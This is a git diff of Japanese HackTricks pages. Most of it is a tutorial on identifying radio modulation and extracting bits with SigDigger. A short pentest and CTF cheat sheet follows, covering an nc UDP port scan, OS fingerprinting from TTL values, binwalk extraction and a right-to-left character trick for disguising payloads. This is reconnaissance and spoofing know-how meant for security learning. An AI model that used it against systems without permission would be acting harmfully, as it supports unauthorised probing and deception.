* **HackTricks**の[**GitHubリポジトリ**](https://github.com/carlospolop/hacktricks)と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)にPRを提出して、あなたのハッキングのコツを共有する。
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,224 +2,156 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)**にPRを提出してください。
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください。
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見する、私たちの独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクション
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)に**参加する**か、[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* **HackTricks**のPRを提出して、あなたのハッキングのコツを共有する [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) githubリポジトリ。
|
||||
|
||||
</details>
|
||||
|
||||
## SigDigger
|
||||
|
||||
[**SigDigger** ](https://github.com/BatchDrake/SigDigger)は、GNU/LinuxとmacOS用の無料のデジタル信号アナライザであり、未知の無線信号の情報を抽出するために設計されています。SoapySDRを介してさまざまなSDRデバイスをサポートし、FSK、PSK、ASK信号の可変復調、アナログビデオのデコード、バースト信号の分析、アナログ音声チャネルのリアルタイムリスニングなどをサポートしています。
|
||||
[**SigDigger**](https://github.com/BatchDrake/SigDigger)はGNU/LinuxとmacOS用の無料のデジタル信号アナライザーで、未知のラジオ信号の情報を抽出するために設計されています。SoapySDRを通じてさまざまなSDRデバイスをサポートし、FSK、PSK、ASK信号の調整可能な復調、アナログビデオのデコード、バースト信号の分析、アナログ音声チャンネルのリアルタイムでのリスニングが可能です。
|
||||
|
||||
### 基本設定
|
||||
|
||||
インストール後、いくつかの設定を検討することができます。\
|
||||
設定(2番目のタブボタン)では、**SDRデバイス**を選択するか、**ファイルを選択**して読み取る周波数とサンプルレート(PCがサポートしている場合は2.56Mspsまで推奨)を選択できます。
|
||||
設定(2番目のタブボタン)で、**SDRデバイス**を選択するか**ファイルを選択**して読み取り、同調する周波数とサンプルレートを選択できます(PCがサポートしている場合は最大2.56Mspsまで上げることをお勧めします)\\
|
||||
|
||||
![](<../../.gitbook/assets/image (655) (1).png>)
|
||||
|
||||
GUIの動作では、PCがサポートしている場合はいくつかの機能を有効にすることをお勧めします。
|
||||
GUIの動作では、PCがサポートしている場合、いくつかの項目を有効にすることをお勧めします:
|
||||
|
||||
![](<../../.gitbook/assets/image (465) (2).png>)
|
||||
|
||||
{% hint style="info" %}
|
||||
PCがキャプチャできていないことに気付いた場合は、OpenGLを無効にし、サンプルレートを下げてみてください。
|
||||
PCが何もキャプチャしていないことに気づいた場合は、OpenGLを無効にしてサンプルレートを下げてみてください。
|
||||
{% endhint %}
|
||||
|
||||
### 用途
|
||||
|
||||
* **信号の一部をキャプチャして分析する**場合は、「Push to capture」ボタンを必要な時間だけ押し続けます。
|
||||
* 信号を**キャプチャして分析する**だけの場合は、必要な時間だけ「Push to capture」ボタンを押し続けてください。
|
||||
|
||||
![](<../../.gitbook/assets/image (631).png>)
|
||||
|
||||
* SigDiggerの**チューナー**は、信号をより良くキャプチャするのに役立ちます(ただし、信号を劣化させることもあります)。理想的には、0から始めて、ノイズが本当に増加し始めるレベルまで**大きくしていく**ことが望ましいです。
|
||||
* SigDiggerの**チューナー**は**より良い信号をキャプチャする**のに役立ちます(しかし、それによって信号が劣化することもあります)。理想的には0から始めて、必要な信号の改善がノイズの増加よりも大きくなるまで**大きくしていきます**。
|
||||
|
||||
![](<../../.gitbook/assets/image (658).png>)
|
||||
|
||||
### ラジオチャンネルとの同期
|
||||
|
||||
[**SigDigger** ](https://github.com/BatchDrake/SigDigger)を使用して、聞きたいチャンネルと同期し、"Baseband audio preview"オプションを設定し、送信されているすべての情報を取得するための帯域幅を設定し、ノイズが本当に増加し始める前のレベルにチューナーを設定します。
|
||||
[**SigDigger**](https://github.com/BatchDrake/SigDigger)で聞きたいチャンネルと同期し、「Baseband audio preview」オプションを設定し、送信されている情報をすべて取得するための帯域幅を設定し、ノイズが本当に増加し始める前のレベルにチューナーを設定します:
|
||||
|
||||
![](<../../.gitbook/assets/image (389).png>)
|
||||
|
||||
## おもしろいトリック
|
||||
## 興味深いコツ
|
||||
|
||||
* デバイスが情報のバーストを送信している場合、通常は**最初の部分が前置部**になるため、そこに情報がない場合やエラーがある場合は心配する必要はありません。
|
||||
* 情報のフレームでは、通常、**互いによく整列した異なるフレーム**を見つけるはずです。
|
||||
* デバイスが情報のバーストを送信している場合、通常**最初の部分はプリアンブル**になるので、そこで情報が見つからない場合やエラーがある場合でも**心配する必要はありません**。
|
||||
* 情報のフレームでは、通常、異なるフレームが互いによく整列しているべきです:
|
||||
|
||||
![](<../../.gitbook/assets/image (660) (1).png>)
|
||||
|
||||
![](<../../.gitbook/assets/image (652) (1) (1).png>)
|
||||
|
||||
* **ビットを回復した後、何らかの方法で処理する必要がある場合があります**。たとえば、マンチェスターコーディングでは、上下は1または0であり、下がり上がりはもう一方の値です。つまり、1と0のペア(上と下)は実際の1または実際の0になります。
|
||||
* マンチェスターコーディングを使用している場合でも(連続して2つ以上の0または1を見つけることは不可能です)、前置部には複数の1または0が一緒になっている場合があります!
|
||||
* **ビットを回復した後、何らかの方法で処理する必要があるかもしれません**。たとえば、マンチェスター符号化では、上昇+下降が1または0になり、下降+上昇がもう一方になります。したがって、1と0のペア(上昇と下降)は実際の1または0になります。
|
||||
* 信号がマンチェスター符号化を使用している場合(2つ以上の0または1が連続して見つかることは不可能です)、プリアンブルで複数の1または0が連続していることがあります!
|
||||
|
||||
### IQを使用して変調方式を特定する
|
||||
### IQで変調タイプを明らかにする
|
||||
|
||||
信号には情報を格納するための3つの方法があります:振幅、周波数、または位相を変調します。\
|
||||
信号をチェックしている場合、情報が格納されている方法を特定しようとするさまざまな方法があります(以下にさらなる方法があります)、しかし、IQグラフをチェックするのは良い方法の1つです。
|
||||
信号に情報を格納する方法には3つあります:**振幅**、**周波数**、または**位相**の変調です。\
|
||||
信号をチェックしている場合、使用されている情報格納方法を見つけるために試すことができるさまざまな方法があります(以下でさらに多くの方法を見つけることができます)が、良い方法の1つはIQグラフをチェックすることです。
|
||||
|
||||
![](<../../.gitbook/assets/image (630).png>)
|
||||
|
||||
* **AMを検出する**:IQグラフに例えば**2つの円**が表示される場合(おそらく1つは0で、もう1つは異なる振幅である可能性があります)、これはAM信号である可能性があります。これは、IQグラフで0と円の間の距離が信号の振幅であるため、異なる振幅が使用されているのが視覚的にわかりやすいからです。
|
||||
* **PMを検出する**:前の画像のように、関連しない小さな円が見つかる場合、おそらく位相変調が使用されていることを意味します。これは、IQグラフで、点と0,0の間の角度が信号の位相であるため、4つの異なる位相が使用されていることを意味します。
|
||||
* 情報が位相自体ではなく位相の変化に隠されている場合、異なる位相が明確に区別されない場合があります。
|
||||
* **FMを検出する**:IQには周波数を識別するためのフィールドがありません(中心への距離は振幅であり、角度は位相です)。\
|
||||
したがって、FMを識別するには、このグラフで基本的に**円だけを見る**必要があります。\
|
||||
さらに、異なる周波数は、IQグラフによって**円を加速させることで「表現」**されます(したがって、SysDiggerで信号を選択するとIQグラフが生成され、作成された円に加
|
||||
* **AMの検出**:IQグラフにたとえば**2つの円**(おそらく1つは0で、もう1つは異なる振幅で)が現れた場合、これはAM信号である可能性があります。これは、IQグラフでは0と円の間の距離が信号の振幅であるため、異なる振幅が使用されているのが簡単に視覚化できるためです。
|
||||
* **PMの検出**:前の画像のように、関連性のない小さな円が見つかった場合、位相変調が使用されている可能性があります。これは、IQグラフでは、点と0,0の間の角度が信号の位相であるため、4つの異なる位相が使用されていることを意味します。
|
||||
* 位相が変化した事実に情報が隠されていて、位相自体にはない場合、異なる位相が明確に区別されているのを見ることはありません。
|
||||
* **FMの検出**:IQには周波数を識別するフィールドがありません(中心までの距離が振幅で、角度が位相です)。\
|
||||
したがって、FMを識別するには、このグラフで**基本的に円だけを見るべき**です。\
|
||||
さらに、異なる周波数はIQグラフによって**円を横切る速度の加速**によって「表されます」(したがって、SysDiggerで信号を選択するとIQグラフが生成され、作成された円に加速または方向の変化が見られた場合、これはFMである可能性があります):
|
||||
|
||||
## AMの例
|
||||
|
||||
{% file src="../../.gitbook/assets/sigdigger_20220308_165547Z_2560000_433500000_float32_iq.raw" %}
|
||||
|
||||
### AMの解明
|
||||
### AMを明らかにする
|
||||
|
||||
#### エンベロープの確認
|
||||
#### エンベロープをチェックする
|
||||
|
||||
[**SigDigger** ](https://github.com/BatchDrake/SigDigger)を使用してAM情報を確認し、**エンベロープ**を見るだけで、異なる明確な振幅レベルが見えます。使用されている信号はAMで情報をパルスで送信しており、以下が1つのパルスの見た目です:
|
||||
[**SigDigger**](https://github.com/BatchDrake/SigDigger)でAM情報をチェックし、**エンベロープ**を見るだけで、異なる明確な振幅レベルが見えます。使用されている信号はAMで情報を送信するパルスを送信しており、これが1つのパルスのように見えます:
|
||||
|
||||
![](<../../.gitbook/assets/image (636).png>)
|
||||
|
||||
そして、以下が波形でシンボルの一部の見た目です:
|
||||
そして、これが波形でのシンボルの一部のように見えます:
|
||||
|
||||
![](<../../.gitbook/assets/image (650) (1).png>)
|
||||
|
||||
#### ヒストグラムの確認
|
||||
#### ヒストグラムをチェックする
|
||||
|
||||
情報が存在する信号全体を選択し、**振幅**モードと**選択**を選択し、**ヒストグラム**をクリックします。2つの明確なレベルのみが見つかることがわかります。
|
||||
情報が配置されている信号全体を**選択**し、**振幅**モードと**選択**を選択し、**ヒストグラム**をクリックします。2つの明確なレベルが見つかることが観察できます
|
||||
|
||||
![](<../../.gitbook/assets/image (647) (1) (1).png>)
|
||||
|
||||
例えば、このAM信号で振幅の代わりに周波数を選択すると、1つの周波数のみが見つかります(周波数で情報が変調されている場合、1つの周波数のみを使用している可能性はありません)。
|
||||
たとえば、このAM信号で振幅の代わりに周波数を選択すると、1つの周波数しか見つかりません(周波数で変調された情報が1つの周波数しか使用していない場合)。
|
||||
|
||||
![](<../../.gitbook/assets/image (637) (1) (1).png>)
|
||||
|
||||
もし多くの周波数が見つかる場合、これはFMではないかもしれません。おそらく、チャンネルの影響で信号の周波数が変更されたためです。
|
||||
多くの周波数が見つかった場合、これはFMではない可能性が高く、おそらく信号の周波数がチャネルのために変更されただけです。
|
||||
|
||||
#### IQでの確認
|
||||
#### IQで
|
||||
|
||||
この例では、**大きな円**があることと、**中心に多くの点**があることがわかります。
|
||||
この例では、**大きな円**があることがわかりますが、**中心にも多くの点があります**。
|
||||
|
||||
![](<../../.gitbook/assets/image (640).png>)
|
||||
|
||||
### シンボルレートの取得
|
||||
### シンボルレートを取得する
|
||||
|
||||
#### 1つのシンボルで
|
||||
|
||||
最も小さいシンボルを選択し(1つだけであることを確認するため)、"Selection freq"を確認します。この場合、1.013kHz(つまり1kHz)です。
|
||||
見つけることができる最小のシンボルを選択します(それが1つだけであることを確認するため)し、「Selection freq」をチェックします。この場合、それは1.013kHz(したがって1kHz)になります。
|
||||
|
||||
![](<../../.gitbook/assets/image (638) (1).png>)
|
||||
|
||||
#### グループのシンボルで
|
||||
#### シンボルのグループで
|
||||
|
||||
選択するシンボルの数を指定することもできます。この場合、10個のシンボルを選択し、"Selection freq"は1.004 kHzです。
|
||||
選択するシンボルの数を示すこともでき、SigDiggerは1つのシンボルの周波数を計算します(選択されたシンボルが多いほど、おそらくより良いでしょう)。このシナリオでは、10個のシンボルを選択し、「Selection freq」は1.004 Khzです:
|
||||
|
||||
![](<../../.gitbook/assets/image (635).png>)
|
||||
|
||||
### ビットの取得
|
||||
### ビットを取得する
|
||||
|
||||
これが**AM変調**された信号であり、**シンボルレート**がわかっている(この場合、上が1を意味し、下が0を意味する)ことがわかっている場合、信号にエンコードされたビットを非常に簡単に取得できます。したがって、情報を持つ信号を選択し、サンプリングと決定を設定し、サンプルを押します(**振幅**が選択されていること、発見された**シンボルレート**が設定されていること、**ガードナークロックリカバリ**が選択されていることを確認してください):
|
||||
これが**AM変調**信号であり、**シンボルレート**が見つかり(そしてこの場合、何かが上がっていると1で、何かが下がっていると0を意味することを知っているため)、信号にエンコードされたビットを非常に簡単に**取得できます**。したがって、情報を持つ信号を選択し、サンプリングと決定を設定し、サンプルを押します(**振幅**が選択されていること、発見された**シンボルレート**が設定されていること、**Gadnerクロックリカバリ**が選択されていることを確認してください):
|
||||
|
||||
![](<../../.gitbook/assets/image (642) (1).png>)
|
||||
|
||||
* **Sync to selection intervals**は、シンボルレートを見つけるために事前に選択した間隔を使用することを意味します。
|
||||
* **Manual**は、指定したシンボルレートが使用されることを意味します。
|
||||
* **Fixed interval selection**では、選択する間隔の数を指定し、それからシンボルレートを計算します。
|
||||
* **ガードナークロックリカバリ**は通常最適なオプションですが、おおよそのシンボルレートを指定する必要があります。
|
||||
* **選択間隔に同期**すると、以前にシンボルレートを見つけるために選択した間隔が使用されることを意味します。
|
||||
* **マニュアル**は、指示されたシンボルレートが使用されることを意味します
|
||||
* **固定間隔選択**では、選択されるべき間隔の数を示し、それからシンボルレートを計算します
|
||||
* **Gadnerクロックリカバリ**は通常最良のオプションですが、いくつかの近似シンボルレートを示す必要があります。
|
||||
|
||||
サンプルを押すと、次のように表示されます:
|
||||
サンプルを押すと、これが表示されます:
|
||||
|
||||
![](<../../.gitbook/assets/image (659).png>)
|
||||
|
||||
次に、SigDiggerに情報を保持しているレベルの範囲を理解させるために、**下のレベル**をクリックし、最大のレベルまでクリックし続ける必要があります。
|
||||
情報を運ぶレベルの範囲が**どこにあるか**をSigDiggerに理解させるためには、**最低レベル**をクリックして、最大レベルまでクリックしたままにする必要があります:
|
||||
|
||||
![](<../../.gitbook/assets/image (662) (1) (1) (1).png>)
|
||||
|
||||
もし例えば**振幅の異なる4つのレベル**があった場合、**Bits per symbolを2に設定**し、最小から最大まで選択する必要があります。
|
||||
たとえば、振幅の**4つの異なるレベル**があった場合、**シンボルごとのビットを2**に設定し、最小から最大まで選択する必要があります。
|
||||
|
||||
最後に、**ズームを増やし**、**行のサイズを変更**することでビットを見ることができます(すべてを選択してコピーすることもできます):
|
||||
最後に、**ズームを増やし**、**行サイズを変更する**ことでビットを見ることができます(そして、すべてを選択してコピーすると、すべてのビットを取得できます):
|
||||
|
||||
![](<../../.gitbook/assets/image (649) (1).png>)
|
||||
|
||||
信号が1つのシンボルあたり1ビット以上(例えば2ビット)を持つ場合、SigDiggerはどのシンボルが00、01、10、11であるかを**知る方法がありません**。そのため、それぞれを表すために異なる**グレースケール**を使用します(ビットをコピーすると、**0から3の数字**が使用されますので、それらを処理する必要があります)。
|
||||
信号にシンボルごとに1ビット以上がある場合(たとえば2つの場合)、SigDiggerはどのシンボルが00、01、10、11であるかを知る方法がないため、それぞれを表すために異なる**グレースケール**を使用します(そして、ビットをコピーすると、**0から3までの数字**を使用します、それらを処理する必要があります)。
|
||||
|
||||
また、**マンチェスター**などの**符号化**を使用する場合、**上+下**は**1または0**であり、**下+上**は1または0になります。この場合、取得した上(1)と下(0)を処理して、01または10のペアを0または1に置き換える必要があります。
|
||||
また、**マンチェスター**などの**符号化**を使用し、**上昇+下降**が**1または0**になり、下降+上昇が1または0になる場合があります。そのような場合、得られた上昇(1)と下降(0)を処理して、01または10のペアを0または1として置き換える必要があります。
|
||||
|
||||
## FMの例
|
||||
|
||||
{% file src="../../.gitbook/assets/sigdigger_20220308_170858Z_2560000_433500000_float32_iq.raw" %}
|
||||
|
||||
### FMの解明
|
||||
|
||||
#### 周波数と波形の確認
|
||||
|
||||
FMで変調された情報を送信する信号の例:
|
||||
|
||||
![](<../../.gitbook/assets/image (661) (1).png>)
|
||||
|
||||
前の画像では、**2つの周波数が使用されている**ことがよくわかりますが、**波形**を観察しても正しく2つの異なる周波数を識別することはできないかもしれません:
|
||||
|
||||
![](<../../.gitbook/assets/image (653).png>)
|
||||
|
||||
これは、私が信号を両方の周波数でキャプチャしたためであり、したがって、1つの周波数は他の周波数に対しておおよそ負の値です:
|
||||
|
||||
![](<../../.gitbook/assets/image (656).png>)
|
||||
|
||||
同期周波数が**1つの周波数に近い**場合、2つの異なる周波数を簡単に見ることができます:
|
||||
|
||||
![](<../../.gitbook/assets/image (648) (1) (1) (1).png>)
|
||||
|
||||
![](<../../.gitbook/assets/image (634).png>)
|
||||
|
||||
#### ヒストグラムの確認
|
||||
|
||||
情報を含む信号の周波数ヒストグラムを確認すると、2つの異なる信号が簡単に見つかります:
|
||||
|
||||
![](<../../.gitbook/assets/image (657).png>)
|
||||
|
||||
この場合、**振幅ヒストグラム**を確認すると、**1つの振幅のみ**が見つかるため、これは**AMではない**ことがわかります(多くの振幅が見つかる場合、信号がチャネルを通じてパワーを失っている可能性があります):
|
||||
|
||||
![](<../../.gitbook/assets/image (646).png>)
|
||||
|
||||
そして、これが位相ヒストグラムです(信号が位相で変調されていないことが非常に明確です):
|
||||
|
||||
![](<../../.gitbook/assets/image (201) (2).png>)
|
||||
#### IQを使用して
|
||||
|
||||
IQには周波数を識別するためのフィールドがありません(中心への距離は振幅で、角度は位相です)。\
|
||||
したがって、FMを識別するには、このグラフでは**基本的に円**しか見えません。\
|
||||
さらに、異なる周波数はIQグラフによって**円周上の速度加速度で「表現」**されます(したがって、SysDiggerで信号を選択するとIQグラフが生成されますが、作成された円に加速度や方向の変化がある場合、これはFMである可能性があります):
|
||||
|
||||
![](<../../.gitbook/assets/image (643) (1).png>)
|
||||
|
||||
### シンボルレートの取得
|
||||
|
||||
シンボルを運ぶ周波数を見つけた後、AMの例と同じ技術を使用してシンボルレートを取得することができます。
|
||||
|
||||
### ビットの取得
|
||||
|
||||
信号が周波数で変調されており、シンボルレートがわかっている場合、AMの例と同じ技術を使用してビットを取得することができます。
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
|
||||
- **サイバーセキュリティ企業**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンやHackTricksのPDFをダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
|
||||
|
||||
</details>
|
||||
{%
|
||||
|
|
57
todo/misc.md
57
todo/misc.md
|
@ -1,43 +1,43 @@
|
|||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ会社**で働いていますか? **HackTricksで会社を宣伝**したいですか?または、**最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
|
||||
- **ハッキングのトリックを共有するには、[hacktricksリポジトリ](https://github.com/carlospolop/hacktricks)と[hacktricks-cloudリポジトリ](https://github.com/carlospolop/hacktricks-cloud)にPRを提出してください。**
|
||||
* **HackTricksにあなたの会社を広告したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS & HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションをチェックする
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)や[**テレグラムグループ**](https://t.me/peass)に**参加する**、または**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)を**フォローする**。
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
Ping応答のTTL:\
|
||||
ping応答のTTL:\
|
||||
127 = Windows\
|
||||
254 = Cisco\
|
||||
その他、いくつかのLinux
|
||||
その他 = 何らかのLinux
|
||||
|
||||
$1$- md5\
|
||||
$2$または$2a$ - Blowfish\
|
||||
$5$- sha256\
|
||||
$6$- sha512
|
||||
|
||||
サービスの背後に何があるかわからない場合は、HTTP GETリクエストを作成してみてください。
|
||||
サービスの背後に何があるかわからない場合は、HTTP GETリクエストを試みてください。
|
||||
|
||||
**UDPスキャン**\
|
||||
nc -nv -u -z -w 1 \<IP> 160-16
|
||||
|
||||
空のUDPパケットが特定のポートに送信されます。UDPポートが開いている場合、ターゲットマシンからは応答が送信されません。UDPポートが閉じている場合、ターゲットマシンからはICMPポート到達不能パケットが送信されるはずです。
|
||||
特定のポートに空のUDPパケットが送信されます。UDPポートが開いている場合、ターゲットマシンから返信は送られません。UDPポートが閉じている場合、ターゲットマシンからICMPポート到達不能パケットが送り返されるべきです。\
|
||||
|
||||
UDPポートスキャンはしばしば信頼性が低く、ファイアウォールやルーターがICMPパケットを破棄することがあります。これにより、スキャンにおいて偽陽性が発生し、スキャンされたマシンのすべてのUDPポートが開いていると表示されることがよくあります。
|
||||
o ほとんどのポートスキャナはすべての利用可能なポートをスキャンせず、通常はスキャンされる「興味深いポート」の事前設定リストを持っています。
|
||||
|
||||
# CTF - トリック
|
||||
UDPポートスキャンはしばしば信頼性が低く、ファイアウォールやルーターがICMP\
|
||||
パケットをドロップすることがあります。これによりスキャンの偽陽性が生じ、スキャンされたマシンで全てのUDPポートが開いていると表示されることがよくあります。\
|
||||
o 多くのポートスキャナーは利用可能な全ポートをスキャンせず、通常はスキャンされる「興味深いポート」のプリセットリストがあります。
|
||||
|
||||
**Windows**では、ファイルを検索するために**Winzip**を使用します。\
|
||||
# CTF - コツ
|
||||
|
||||
**Windows**では**Winzip**を使用してファイルを検索します。\
|
||||
**Alternate data Streams**: _dir /r | find ":$DATA"_\
|
||||
```
|
||||
binwalk --dd=".*" <file> #Extract everything
|
||||
|
@ -47,12 +47,11 @@ binwalk -M -e -d=10000 suspicious.pdf #Extract, look inside extracted files and
|
|||
|
||||
**featherduster**\
|
||||
|
||||
|
||||
**Basae64**(6—>8) —> 0...9, a...z, A…Z,+,/\
|
||||
**Base32**(5 —>8) —> A…Z, 2…7\
|
||||
**Base85** (Ascii85, 7—>8) —> 0...9, a...z, A...Z, ., -, :, +, =, ^, !, /, \*, ?, &, <, >, (, ), \[, ], {, }, @, %, $, #\
|
||||
**Uuencode** --> "_begin \<mode> \<filename>_" で始まり、奇妙な文字\
|
||||
**Xxencoding** --> "_begin \<mode> \<filename>_" で始まり、B64\
|
||||
**Uuencode** --> "_begin \<mode> \<filename>_" で始まり、奇妙な文字が含まれる\
|
||||
**Xxencoding** --> "_begin \<mode> \<filename>_" で始まり、B64を使用する\
|
||||
\
|
||||
**Vigenere** (頻度分析) —> [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver)\
|
||||
**Scytale** (文字のオフセット) —> [https://www.dcode.fr/scytale-cipher](https://www.dcode.fr/scytale-cipher)
|
||||
|
@ -66,21 +65,19 @@ Snow --> スペースとタブを使用してメッセージを隠す
|
|||
|
||||
# 文字
|
||||
|
||||
%E2%80%AE => RTL文字 (ペイロードを逆に書く)
|
||||
%E2%80%AE => RTL 文字 (ペイロードを逆から書く)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary><strong>AWSハッキングをゼロからヒーローまで学ぶには</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>をチェック!</strong></summary>
|
||||
|
||||
- **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見しましょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
|
||||
|
||||
- [**公式のPEASS&HackTricksのグッズ**](https://peass.creator-spring.com)を手に入れましょう。
|
||||
|
||||
- [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
||||
